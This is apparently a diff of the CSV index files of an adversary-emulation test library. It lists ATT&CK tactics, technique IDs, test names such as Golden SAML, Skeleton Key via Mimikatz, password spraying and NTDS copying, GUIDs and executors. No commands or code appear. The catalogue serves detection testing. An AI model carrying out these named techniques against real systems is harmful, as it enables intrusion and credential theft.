persistence,T1098,Account Manipulation,5,Azure AD - adding service principal to Azure AD role,92c40b3f-c406-4d1f-8d2b-c039bf5009e4,powershell
persistence,T1098,Account Manipulation,8,Azure AD - adding permission to application,94ea9cc3-81f9-4111-8dde-3fb54f36af4b,powershell
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
credential-access T1110.001 Brute Force: Password Guessing 3 Brute Force Credentials of single Azure AD user 5a51ef57-299e-4d62-8e11-2d440df55e69 powershell
credential-access T1606.002 Forge Web Credentials: SAML token 1 Golden SAML b16a03bc-1089-4dcc-ad98-30fe8f3a2b31 powershell
credential-access T1110.003 Brute Force: Password Spraying 4 Password spray all Azure AD users with a single password a8aa2d3e-1c52-4016-bc73-0f8854cfa80a powershell
credential-access T1110.003 Brute Force: Password Spraying 7 Password Spray Microsoft Online Accounts with MSOLSpray (Azure/O365) f3a10056-0160-4785-8744-d9bd7c12dc39 powershell
defense-evasion T1484.002 Domain Trust Modification 1 Add Federation to Azure AD 8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7 powershell
privilege-escalation T1484.002 Domain Trust Modification 1 Add Federation to Azure AD 8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7 powershell
privilege-escalation T1098.003 Account Manipulation: Additional Cloud Roles 1 Azure AD - Add Company Administrator Role to a user 4d77f913-56f5-4a14-b4b1-bf7bb24298ad powershell
privilege-escalation T1098.003 Account Manipulation: Additional Cloud Roles 2 Simulate - Post BEC persistence via user password reset followed by user added to company administrator role 14f3af20-61f1-45b8-ad31-4637815f3f44 powershell
privilege-escalation T1098.001 Account Manipulation: Additional Cloud Credentials 1 Azure AD Application Hijacking - Service Principal b8e747c3-bdf7-4d71-bce2-f1df2a057406 powershell
privilege-escalation T1098.001 Account Manipulation: Additional Cloud Credentials 2 Azure AD Application Hijacking - App Registration a12b5531-acab-4618-a470-0dafb294a87a powershell
privilege-escalation T1098 Account Manipulation 4 Azure AD - adding user to Azure AD role 0e65ae27-5385-46b4-98ac-607a8ee82261 powershell
privilege-escalation T1098 Account Manipulation 5 Azure AD - adding service principal to Azure AD role 92c40b3f-c406-4d1f-8d2b-c039bf5009e4 powershell
privilege-escalation T1098 Account Manipulation 8 Azure AD - adding permission to application 94ea9cc3-81f9-4111-8dde-3fb54f36af4b powershell
persistence T1098.003 Account Manipulation: Additional Cloud Roles 1 Azure AD - Add Company Administrator Role to a user 4d77f913-56f5-4a14-b4b1-bf7bb24298ad powershell
persistence T1098.003 Account Manipulation: Additional Cloud Roles 2 Simulate - Post BEC persistence via user password reset followed by user added to company administrator role 14f3af20-61f1-45b8-ad31-4637815f3f44 powershell
persistence T1098.001 Account Manipulation: Additional Cloud Credentials 1 Azure AD Application Hijacking - Service Principal b8e747c3-bdf7-4d71-bce2-f1df2a057406 powershell
persistence T1098.001 Account Manipulation: Additional Cloud Credentials 2 Azure AD Application Hijacking - App Registration a12b5531-acab-4618-a470-0dafb294a87a powershell
persistence T1136.003 Create Account: Cloud Account 2 Azure AD - Create a new user e62d23ef-3153-4837-8625-fa4a3829134d powershell
persistence T1136.003 Create Account: Cloud Account 3 Azure AD - Create a new user via Azure CLI 228c7498-be31-48e9-83b7-9cb906504ec8 powershell
persistence T1098 Account Manipulation 4 Azure AD - adding user to Azure AD role 0e65ae27-5385-46b4-98ac-607a8ee82261 powershell
persistence T1098 Account Manipulation 5 Azure AD - adding service principal to Azure AD role 92c40b3f-c406-4d1f-8d2b-c039bf5009e4 powershell
persistence T1098 Account Manipulation 8 Azure AD - adding permission to application 94ea9cc3-81f9-4111-8dde-3fb54f36af4b powershell
atomics/Indexes/Indexes-CSV/esxi-index.csv
-1
View File
@@ -1 +0,0 @@
Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
atomics/Indexes/Indexes-CSV/iaas-index.csv
-1
View File
@@ -8,7 +8,6 @@ defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,6,AWS - Remove VPC
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,7,AWS - CloudWatch Log Group Deletes,89422c87-b57b-4a04-a8ca-802bb9d06121,sh
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,8,AWS CloudWatch Log Stream Deletes,33ca84bc-4259-4943-bd36-4655dc420932,sh
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,10,GCP - Delete Activity Event Log,d56152ec-01d9-42a2-877c-aac1f6ebe8e6,sh
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,11,AWS - Config Logs Disabled,4608bc1b-e682-466b-a7d7-dbd76760db31,sh
defense-evasion,T1578.001,Modify Cloud Compute Infrastructure: Create Snapshot,1,AWS - Create Snapshot from EBS Volume,a3c09662-85bb-4ea8-b15b-6dc8a844e236,sh
defense-evasion,T1578.001,Modify Cloud Compute Infrastructure: Create Snapshot,2,Azure - Create Snapshot from Managed Disk,89e69b4b-3458-4ec6-b819-b3008debc1bc,sh
defense-evasion,T1578.001,Modify Cloud Compute Infrastructure: Create Snapshot,3,GCP - Create Snapshot from Persistent Disk,e6fbc036-91e7-4ad3-b9cb-f7210f40dd5d,sh
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
8 defense-evasion T1562.008 Impair Defenses: Disable Cloud Logs 7 AWS - CloudWatch Log Group Deletes 89422c87-b57b-4a04-a8ca-802bb9d06121 sh
9 defense-evasion T1562.008 Impair Defenses: Disable Cloud Logs 8 AWS CloudWatch Log Stream Deletes 33ca84bc-4259-4943-bd36-4655dc420932 sh
10 defense-evasion T1562.008 Impair Defenses: Disable Cloud Logs 10 GCP - Delete Activity Event Log d56152ec-01d9-42a2-877c-aac1f6ebe8e6 sh
defense-evasion T1562.008 Impair Defenses: Disable Cloud Logs 11 AWS - Config Logs Disabled 4608bc1b-e682-466b-a7d7-dbd76760db31 sh
11 defense-evasion T1578.001 Modify Cloud Compute Infrastructure: Create Snapshot 1 AWS - Create Snapshot from EBS Volume a3c09662-85bb-4ea8-b15b-6dc8a844e236 sh
12 defense-evasion T1578.001 Modify Cloud Compute Infrastructure: Create Snapshot 2 Azure - Create Snapshot from Managed Disk 89e69b4b-3458-4ec6-b819-b3008debc1bc sh
13 defense-evasion T1578.001 Modify Cloud Compute Infrastructure: Create Snapshot 3 GCP - Create Snapshot from Persistent Disk e6fbc036-91e7-4ad3-b9cb-f7210f40dd5d sh
atomics/Indexes/Indexes-CSV/index.csv
+6 -55
View File
@@ -38,7 +38,6 @@ defense-evasion,T1006,Direct Volume Access,1,Read volume boot sector via DOS dev
defense-evasion,T1564.008,Hide Artifacts: Email Hiding Rules,1,New-Inbox Rule to Hide E-mail in M365,30f7d3d1-78e2-4bf0-9efa-a175b5fce2a9,powershell
defense-evasion,T1027.013,Obfuscated Files or Information: Encrypted/Encoded File,1,Decode Eicar File and Write to File,7693ccaa-8d64-4043-92a5-a2eb70359535,powershell
defense-evasion,T1027.013,Obfuscated Files or Information: Encrypted/Encoded File,2,Decrypt Eicar File and Write to File,b404caaa-12ce-43c7-9214-62a531c044f7,powershell
defense-evasion,T1027.013,Obfuscated Files or Information: Encrypted/Encoded File,3,Password-Protected ZIP Payload Extraction and Execution,c2ca068a-eb1e-498f-9f93-3d554c455916,bash
defense-evasion,T1014,Rootkit,1,Loadable Kernel Module based Rootkit,dfb50072-e45a-4c75-a17e-a484809c8553,sh
defense-evasion,T1014,Rootkit,2,Loadable Kernel Module based Rootkit,75483ef8-f10f-444a-bf02-62eb0e48db6f,sh
defense-evasion,T1014,Rootkit,3,dynamic-linker based rootkit (libprocesshider),1338bf0c-fd0c-48c0-9e65-329f18e2c0d3,sh
@@ -556,7 +555,6 @@ defense-evasion,T1027,Obfuscated Files or Information,7,Obfuscated Command in Po
defense-evasion,T1027,Obfuscated Files or Information,8,Obfuscated Command Line using special Unicode characters,e68b945c-52d0-4dd9-a5e8-d173d70c448f,manual
defense-evasion,T1027,Obfuscated Files or Information,9,Snake Malware Encrypted crmlog file,7e47ee60-9dd1-4269-9c4f-97953b183268,powershell
defense-evasion,T1027,Obfuscated Files or Information,10,Execution from Compressed JScript File,fad04df1-5229-4185-b016-fb6010cd87ac,command_prompt
defense-evasion,T1027,Obfuscated Files or Information,11,Obfuscated PowerShell Command via Character Array,6683baf0-6e77-4f58-b114-814184ea8150,powershell
defense-evasion,T1564.006,Run Virtual Instance,1,Register Portable Virtualbox,c59f246a-34f8-4e4d-9276-c295ef9ba0dd,command_prompt
defense-evasion,T1564.006,Run Virtual Instance,2,Create and start VirtualBox virtual machine,88b81702-a1c0-49a9-95b2-2dd53d755767,command_prompt
defense-evasion,T1564.006,Run Virtual Instance,3,Create and start Hyper-V virtual machine,fb8d4d7e-f5a4-481c-8867-febf13f8b6d3,powershell
@@ -605,11 +603,9 @@ defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,7,AWS - CloudWatch
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,8,AWS CloudWatch Log Stream Deletes,33ca84bc-4259-4943-bd36-4655dc420932,sh
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,9,Office 365 - Set Audit Bypass For a Mailbox,c9a2f6fe-7197-488c-af6d-10c782121ca6,powershell
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,10,GCP - Delete Activity Event Log,d56152ec-01d9-42a2-877c-aac1f6ebe8e6,sh
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,11,AWS - Config Logs Disabled,4608bc1b-e682-466b-a7d7-dbd76760db31,sh
defense-evasion,T1564.003,Hide Artifacts: Hidden Window,1,Hidden Window,f151ee37-9e2b-47e6-80e4-550b9f999b7a,powershell
defense-evasion,T1564.003,Hide Artifacts: Hidden Window,2,Headless Browser Accessing Mockbin,0ad9ab92-c48c-4f08-9b20-9633277c4646,command_prompt
defense-evasion,T1564.003,Hide Artifacts: Hidden Window,3,Hidden Window-Conhost Execution,5510d22f-2595-4911-8456-4d630c978616,powershell
defense-evasion,T1556.001,Modify Authentication Process: Domain Controller Authentication,1,Skeleton Key via Mimikatz,0ee8081f-e9a7-4a2e-a23f-68473023184f,powershell
defense-evasion,T1027.006,HTML Smuggling,1,HTML Smuggling Remote Payload,30cbeda4-08d9-42f1-8685-197fad677734,powershell
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,1,Delete a single file - FreeBSD/Linux/macOS,562d737f-2fc6-4b09-8c2a-7f8ff0828480,sh
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,2,Delete an entire folder - FreeBSD/Linux/macOS,a415f17e-ce8d-4ce2-a8b4-83b674e7017e,sh
@@ -931,11 +927,6 @@ privilege-escalation,T1574.009,Hijack Execution Flow: Path Interception by Unquo
privilege-escalation,T1037.005,Boot or Logon Initialization Scripts: Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh
privilege-escalation,T1037.005,Boot or Logon Initialization Scripts: Startup Items,2,Add launch script to launch daemon,fc369906-90c7-4a15-86fd-d37da624dde6,bash
privilege-escalation,T1037.005,Boot or Logon Initialization Scripts: Startup Items,3,Add launch script to launch agent,10cf5bec-49dd-4ebf-8077-8f47e420096f,bash
privilege-escalation,T1546.018,Event Triggered Execution: Python Startup Hooks,1,Python Startup Hook - atomic_hook.pth (Windows),57289962-21dc-4501-b756-80cd30608d9f,powershell
privilege-escalation,T1546.018,Event Triggered Execution: Python Startup Hooks,2,Python Startup Hook - usercustomize.py (Windows),05cc7a2c-ce32-46f2-a358-f27f76718c39,powershell
privilege-escalation,T1546.018,Event Triggered Execution: Python Startup Hooks,3,Python Startup Hook - atomic_hook.pth (Linux),a58c066d-f2f0-42a2-ab70-30af73f89e66,sh
privilege-escalation,T1546.018,Event Triggered Execution: Python Startup Hooks,4,Python Startup Hook - atomic_hook.pth (macOS),28ca4f81-fa96-47ff-8555-dde98017e89b,sh
privilege-escalation,T1546.018,Event Triggered Execution: Python Startup Hooks,5,Python Startup Hook - usercustomize.py (Linux / MacOS),6e78084a-a433-4702-a838-cc7b765d87e8,sh
privilege-escalation,T1546.010,Event Triggered Execution: AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt
privilege-escalation,T1546.002,Event Triggered Execution: Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt
privilege-escalation,T1543.001,Create or Modify System Process: Launch Agent,1,Launch Agent,a5983dee-bf6c-4eaf-951c-dbc1a7b90900,bash
@@ -1033,14 +1024,6 @@ execution,T1106,Native API,3,WinPwn - Get SYSTEM shell - Bind System Shell using
execution,T1106,Native API,4,WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique,e1f93a06-1649-4f07-89a8-f57279a7d60e,powershell
execution,T1106,Native API,5,Run Shellcode via Syscall in Go,ae56083f-28d0-417d-84da-df4242da1f7c,powershell
execution,T1059.010,Command and Scripting Interpreter: AutoHotKey & AutoIT,1,AutoHotKey script execution,7b5d350e-f758-43cc-a761-8e3f6b052a03,powershell
execution,T1569.003,System Services: Systemctl,1,Create and Enable a Malicious systemd Service Unit,e58c8723-5503-4533-b642-535cd20ec648,sh
execution,T1569.003,System Services: Systemctl,2,Create systemd Service Unit from /tmp (Unusual Location),a1fa406e-2354-4a24-b6d6-94157e7564d4,sh
execution,T1569.003,System Services: Systemctl,3,Create systemd Service Unit from /dev/shm (Unusual Location),dce49381-a26b-4d95-bdfa-c607ffe8bee5,sh
execution,T1569.003,System Services: Systemctl,4,Modify Existing systemd Service to Execute Malicious Command,6123928f-6389-4914-8d25-a5d69bd657fa,sh
execution,T1569.003,System Services: Systemctl,5,Execute Command via Transient systemd Service (systemd-run),a73a886f-23c5-4e8f-b1ab-b1bbc1f5e236,sh
execution,T1569.003,System Services: Systemctl,6,Enumerate All systemd Services Using systemctl,1e5be8d4-605a-4acb-8709-2f80b2d8ea95,sh
execution,T1569.003,System Services: Systemctl,7,Enable systemd Service for Persistence with Auto-Restart,2fc6c0ab-4f88-4eb8-ab1b-f739fc22bba7,sh
execution,T1569.003,System Services: Systemctl,8,Masquerade Malicious Service as Legitimate System Service,6fec8560-ff64-4bbf-bc79-734fea48f7ca,sh
execution,T1610,Deploy a container,1,Deploy Docker container,59aa6f26-7620-417e-9318-589e0fb7a372,bash
execution,T1059,Command and Scripting Interpreter,1,AutoIt Script Execution,a9b93f17-31cb-435d-a462-5e838a2a6026,powershell
execution,T1609,Kubernetes Exec Into Container,1,ExecIntoContainer,d03bfcd3-ed87-49c8-8880-44bb772dea4b,bash
@@ -1182,14 +1165,10 @@ persistence,T1556.002,Modify Authentication Process: Password Filter DLL,2,Insta
persistence,T1505.005,Server Software Component: Terminal Services DLL,1,Simulate Patching termsrv.dll,0b2eadeb-4a64-4449-9d43-3d999f4a317b,powershell
persistence,T1505.005,Server Software Component: Terminal Services DLL,2,Modify Terminal Services DLL Path,18136e38-0530-49b2-b309-eed173787471,powershell
persistence,T1176,Browser Extensions,1,Chrome/Chromium (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual
persistence,T1176,Browser Extensions,2,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
persistence,T1176,Browser Extensions,3,Edge Chromium Addon - VPN,3d456e2b-a7db-4af8-b5b3-720e7c4d9da5,manual
persistence,T1176,Browser Extensions,4,Google Chrome Load Unpacked Extension With Command Line,7a714703-9f6b-461c-b06d-e6aeac650f27,powershell
persistence,T1137.005,Office Application Startup: Outlook Rules,1,Outlook Rule - Subject Trigger with DeletePermanently Action via COM Object,ffadc988-b682-4a68-bd7e-4803666be637,powershell
persistence,T1137.005,Office Application Startup: Outlook Rules,2,Outlook Rule - Sender Address Trigger with DeletePermanently Action via COM Object,bddfd8d4-7687-4971-b611-50a537ab3ab4,powershell
persistence,T1137.005,Office Application Startup: Outlook Rules,3,Outlook Rule - Auto-Forward Emails to External Address via COM Object,b0bd3d76-a57c-4699-83f4-8cd798dd09bd,powershell
persistence,T1137.005,Office Application Startup: Outlook Rules,4,Outlook Rules - Enumerate Existing Rules via PowerShell COM Object,5ff5249a-5807-480e-ab52-c430497a8a25,powershell
persistence,T1137.005,Office Application Startup: Outlook Rules,5,Outlook Rule - Create Rule with Obfuscated Blank Name (MAPI Evasion),cb814cf8-24f2-41dc-a1cd-1c2073276d4a,powershell
persistence,T1176,Browser Extensions,2,Chrome/Chromium (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual
persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
persistence,T1176,Browser Extensions,4,Edge Chromium Addon - VPN,3d456e2b-a7db-4af8-b5b3-720e7c4d9da5,manual
persistence,T1176,Browser Extensions,5,Google Chrome Load Unpacked Extension With Command Line,7a714703-9f6b-461c-b06d-e6aeac650f27,powershell
persistence,T1546.011,Event Triggered Execution: Application Shimming,1,Application Shim Installation,9ab27e22-ee62-4211-962b-d36d9a0e6a18,command_prompt
persistence,T1546.011,Event Triggered Execution: Application Shimming,2,New shim database files created in the default shim database directory,aefd6866-d753-431f-a7a4-215ca7e3f13d,powershell
persistence,T1546.011,Event Triggered Execution: Application Shimming,3,Registry key creation and/or modification events for SDB,9b6a06f9-ab5e-4e8d-8289-1df4289db02f,powershell
@@ -1425,11 +1404,6 @@ persistence,T1574.009,Hijack Execution Flow: Path Interception by Unquoted Path,
persistence,T1037.005,Boot or Logon Initialization Scripts: Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh
persistence,T1037.005,Boot or Logon Initialization Scripts: Startup Items,2,Add launch script to launch daemon,fc369906-90c7-4a15-86fd-d37da624dde6,bash
persistence,T1037.005,Boot or Logon Initialization Scripts: Startup Items,3,Add launch script to launch agent,10cf5bec-49dd-4ebf-8077-8f47e420096f,bash
persistence,T1546.018,Event Triggered Execution: Python Startup Hooks,1,Python Startup Hook - atomic_hook.pth (Windows),57289962-21dc-4501-b756-80cd30608d9f,powershell
persistence,T1546.018,Event Triggered Execution: Python Startup Hooks,2,Python Startup Hook - usercustomize.py (Windows),05cc7a2c-ce32-46f2-a358-f27f76718c39,powershell
persistence,T1546.018,Event Triggered Execution: Python Startup Hooks,3,Python Startup Hook - atomic_hook.pth (Linux),a58c066d-f2f0-42a2-ab70-30af73f89e66,sh
persistence,T1546.018,Event Triggered Execution: Python Startup Hooks,4,Python Startup Hook - atomic_hook.pth (macOS),28ca4f81-fa96-47ff-8555-dde98017e89b,sh
persistence,T1546.018,Event Triggered Execution: Python Startup Hooks,5,Python Startup Hook - usercustomize.py (Linux / MacOS),6e78084a-a433-4702-a838-cc7b765d87e8,sh
persistence,T1197,BITS Jobs,1,Bitsadmin Download (cmd),3c73d728-75fb-4180-a12f-6712864d7421,command_prompt
persistence,T1197,BITS Jobs,2,Bitsadmin Download (PowerShell),f63b8bc4-07e5-4112-acba-56f646f3f0bc,powershell
persistence,T1197,BITS Jobs,3,"Persist, Download, & Execute",62a06ec5-5754-47d2-bcfc-123d8314c6ae,command_prompt
@@ -1439,7 +1413,6 @@ persistence,T1546.002,Event Triggered Execution: Screensaver,1,Set Arbitrary Bin
persistence,T1543.001,Create or Modify System Process: Launch Agent,1,Launch Agent,a5983dee-bf6c-4eaf-951c-dbc1a7b90900,bash
persistence,T1543.001,Create or Modify System Process: Launch Agent,2,Event Monitor Daemon Persistence,11979f23-9b9d-482a-9935-6fc9cd022c3e,bash
persistence,T1543.001,Create or Modify System Process: Launch Agent,3,Launch Agent - Root Directory,66774fa8-c562-4bae-a58d-5264a0dd9dd7,bash
persistence,T1556.001,Modify Authentication Process: Domain Controller Authentication,1,Skeleton Key via Mimikatz,0ee8081f-e9a7-4a2e-a23f-68473023184f,powershell
persistence,T1037.004,Boot or Logon Initialization Scripts: Rc.common,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1d163e762de,bash
persistence,T1037.004,Boot or Logon Initialization Scripts: Rc.common,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash
persistence,T1037.004,Boot or Logon Initialization Scripts: Rc.common,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,sh
@@ -1479,7 +1452,6 @@ persistence,T1574.012,Hijack Execution Flow: COR_PROFILER,3,Registry-free proces
command-and-control,T1132.001,Data Encoding: Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh
command-and-control,T1132.001,Data Encoding: Standard Encoding,2,Base64 Encoded data (freebsd),2d97c626-7652-449e-a986-b02d9051c298,sh
command-and-control,T1132.001,Data Encoding: Standard Encoding,3,XOR Encoded data.,c3ed6d2a-e3ad-400d-ad78-bbfdbfeacc08,powershell
command-and-control,T1568.002,Dynamic Resolution: Domain Generation Algorithms,1,DGA Simulation (Python),cc367493-3a00-4c4a-a685-16b73339167c,bash
command-and-control,T1071.004,Application Layer Protocol: DNS,1,DNS Large Query Volume,1700f5d6-5a44-487b-84de-bc66f507b0a6,powershell
command-and-control,T1071.004,Application Layer Protocol: DNS,2,DNS Regular Beaconing,3efc144e-1af8-46bb-8ca2-1376bb6db8b6,powershell
command-and-control,T1071.004,Application Layer Protocol: DNS,3,DNS Long Domain Query,fef31710-223a-40ee-8462-a396d6b66978,powershell
@@ -1500,8 +1472,6 @@ command-and-control,T1219,Remote Access Software,12,RustDesk Files Detected Test
command-and-control,T1219,Remote Access Software,13,Splashtop Execution,b025c580-029e-4023-888d-a42710d76934,powershell
command-and-control,T1219,Remote Access Software,14,Splashtop Streamer Execution,3e1858ee-3550-401c-86ec-5e70ed79295b,powershell
command-and-control,T1219,Remote Access Software,15,Microsoft App Quick Assist Execution,1aea6d15-70f1-4b4e-8b02-397b5d5ffe75,powershell
command-and-control,T1659,Content Injection,1,MITM Proxy Injection,9b360eaf-c778-4f07-a6e7-895c4f01ac1c,bash
command-and-control,T1659,Content Injection,2,MITM Proxy Injection (Windows),dcc2ca85-a21c-43a4-acc7-7314d4e5891c,powershell
command-and-control,T1572,Protocol Tunneling,1,DNS over HTTPS Large Query Volume,ae9ef4b0-d8c1-49d4-8758-06206f19af0a,powershell
command-and-control,T1572,Protocol Tunneling,2,DNS over HTTPS Regular Beaconing,0c5f9705-c575-42a6-9609-cbbff4b2fc9b,powershell
command-and-control,T1572,Protocol Tunneling,3,DNS over HTTPS Long Domain Query,748a73d5-cea4-4f34-84d8-839da5baa99c,powershell
@@ -1589,7 +1559,6 @@ collection,T1113,Screen Capture,6,Capture Linux Desktop using Import Tool (freeb
collection,T1113,Screen Capture,7,Windows Screencapture,3c898f62-626c-47d5-aad2-6de873d69153,powershell
collection,T1113,Screen Capture,8,Windows Screen Capture (CopyFromScreen),e9313014-985a-48ef-80d9-cde604ffc187,powershell
collection,T1113,Screen Capture,9,Windows Recall Feature Enabled - DisableAIDataAnalysis Value Deleted,5a496325-0115-4274-8eb9-755b649ad0fb,powershell
collection,T1113,Screen Capture,10,RDP Bitmap Cache Extraction via bmc-tools,98f19852-7348-4f99-9e15-6ff4320464c7,powershell
collection,T1056.001,Input Capture: Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell
collection,T1056.001,Input Capture: Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
collection,T1056.001,Input Capture: Keylogging,3,Logging bash history to syslog,0e59d59d-3265-4d35-bebd-bf5c1ec40db5,sh
@@ -1850,7 +1819,6 @@ credential-access,T1003.008,"OS Credential Dumping: /etc/passwd, /etc/master.pas
credential-access,T1558.002,Steal or Forge Kerberos Tickets: Silver Ticket,1,Crafting Active Directory silver tickets with mimikatz,385e59aa-113e-4711-84d9-f637aef01f2c,powershell
credential-access,T1555.004,Credentials from Password Stores: Windows Credential Manager,1,Access Saved Credentials via VaultCmd,9c2dd36d-5c8b-4b29-8d72-a11b0d5d7439,command_prompt
credential-access,T1555.004,Credentials from Password Stores: Windows Credential Manager,2,WinPwn - Loot local Credentials - Invoke-WCMDump,fa714db1-63dd-479e-a58e-7b2b52ca5997,powershell
credential-access,T1556.001,Modify Authentication Process: Domain Controller Authentication,1,Skeleton Key via Mimikatz,0ee8081f-e9a7-4a2e-a23f-68473023184f,powershell
credential-access,T1003.003,OS Credential Dumping: NTDS,1,Create Volume Shadow Copy with vssadmin,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt
credential-access,T1003.003,OS Credential Dumping: NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt
credential-access,T1003.003,OS Credential Dumping: NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt
@@ -1860,8 +1828,6 @@ credential-access,T1003.003,OS Credential Dumping: NTDS,6,Create Volume Shadow C
credential-access,T1003.003,OS Credential Dumping: NTDS,7,Create Volume Shadow Copy with Powershell,542bb97e-da53-436b-8e43-e0a7d31a6c24,powershell
credential-access,T1003.003,OS Credential Dumping: NTDS,8,Create Symlink to Volume Shadow Copy,21748c28-2793-4284-9e07-d6d028b66702,command_prompt
credential-access,T1003.003,OS Credential Dumping: NTDS,9,Create Volume Shadow Copy with diskshadow,b385996c-0e7d-4e27-95a4-aca046b119a7,command_prompt
credential-access,T1003.003,OS Credential Dumping: NTDS,10,Copy NTDS in low level NTFS acquisition via MFT parsing,f57cb283-c131-4e2f-8a6c-363d575748b2,powershell
credential-access,T1003.003,OS Credential Dumping: NTDS,11,Copy NTDS in low level NTFS acquisition via fsutil,c7be89f7-5d06-4321-9f90-8676a77e0502,powershell
credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,1,Request for service tickets,3f987809-3681-43c8-bcd8-b3ff3a28533a,powershell
credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,2,Rubeus kerberoast,14625569-6def-4497-99ac-8e7817105b55,powershell
credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,3,Extract all accounts in use as SPN using setspn,e6f4affd-d826-4871-9a62-6c9004b8fe06,command_prompt
@@ -1895,10 +1861,6 @@ discovery,T1615,Group Policy Discovery,3,WinPwn - GPOAudit,bc25c04b-841e-4965-85
discovery,T1615,Group Policy Discovery,4,WinPwn - GPORemoteAccessPolicy,7230d01a-0a72-4bd5-9d7f-c6d472bc6a59,powershell
discovery,T1615,Group Policy Discovery,5,MSFT Get-GPO Cmdlet,52778a8f-a10b-41a4-9eae-52ddb74072bf,powershell
discovery,T1652,Device Driver Discovery,1,Device Driver Discovery,235b30a2-e5b1-441f-9705-be6231c88ddd,powershell
discovery,T1652,Device Driver Discovery,2,Device Driver Discovery (Linux),d57dfc9e-ed9a-418e-88f8-b59c85f8cfd1,bash
discovery,T1652,Device Driver Discovery,3,Enumerate Kernel Driver Files (Linux),13c0fef5-9be9-4d7f-9c6b-901624e53770,bash
discovery,T1652,Device Driver Discovery,4,List loaded kernel extensions (macOS),71eab73d-5d7d-4681-9a72-7873489a5b85,bash
discovery,T1652,Device Driver Discovery,5,Find Kernel Extensions (macOS),c63bbe52-6f17-4832-b221-f07ba8b1736f,bash
discovery,T1087.002,Account Discovery: Domain Account,1,Enumerate all accounts (Domain),6fbc9e68-5ad7-444a-bd11-8bf3136c477e,command_prompt
discovery,T1087.002,Account Discovery: Domain Account,2,Enumerate all accounts via PowerShell (Domain),8b8a6449-be98-4f42-afd2-dedddc7453b2,powershell
discovery,T1087.002,Account Discovery: Domain Account,3,Enumerate logged on users via CMD (Domain),161dcd85-d014-4f5e-900c-d3eaae82a0f7,command_prompt
@@ -1961,10 +1923,6 @@ discovery,T1007,System Service Discovery,1,System Service Discovery,89676ba1-b1f
discovery,T1007,System Service Discovery,2,System Service Discovery - net.exe,5f864a3f-8ce9-45c0-812c-bdf7d8aeacc3,command_prompt
discovery,T1007,System Service Discovery,3,System Service Discovery - systemctl/service,f4b26bce-4c2c-46c0-bcc5-fce062d38bef,bash
discovery,T1007,System Service Discovery,4,Get-Service Execution,51f17016-d8fa-4360-888a-df4bf92c4a04,command_prompt
discovery,T1007,System Service Discovery,5,System Service Discovery - macOS launchctl,9b378962-a75e-4856-b117-2503d6dcebba,sh
discovery,T1007,System Service Discovery,6,System Service Discovery - Windows Scheduled Tasks (schtasks),7cd7eaa3-9ccc-460d-96d2-c6fb13e6d58a,command_prompt
discovery,T1007,System Service Discovery,7,System Service Discovery - Services Registry Enumeration,d70d82bd-bb00-4837-b146-b40d025551b2,powershell
discovery,T1007,System Service Discovery,8,System Service Discovery - Linux init scripts,8f2a5d2b-4018-46d4-8f3f-0fea53754690,sh
discovery,T1040,Network Sniffing,1,Packet Capture Linux using tshark or tcpdump,7fe741f7-b265-4951-a7c7-320889083b3e,bash
discovery,T1040,Network Sniffing,2,Packet Capture FreeBSD using tshark or tcpdump,c93f2492-9ebe-44b5-8b45-36574cccfe67,sh
discovery,T1040,Network Sniffing,3,Packet Capture macOS using tcpdump or tshark,9d04efee-eff5-4240-b8d2-07792b873608,bash
@@ -2081,11 +2039,8 @@ discovery,T1083,File and Directory Discovery,8,Identifying Network Shares - Linu
discovery,T1083,File and Directory Discovery,9,Recursive Enumerate Files And Directories By Powershell,95a21323-770d-434c-80cd-6f6fbf7af432,powershell
discovery,T1049,System Network Connections Discovery,1,System Network Connections Discovery,0940a971-809a-48f1-9c4d-b1d785e96ee5,command_prompt
discovery,T1049,System Network Connections Discovery,2,System Network Connections Discovery with PowerShell,f069f0f1-baad-4831-aa2b-eddac4baac4a,powershell
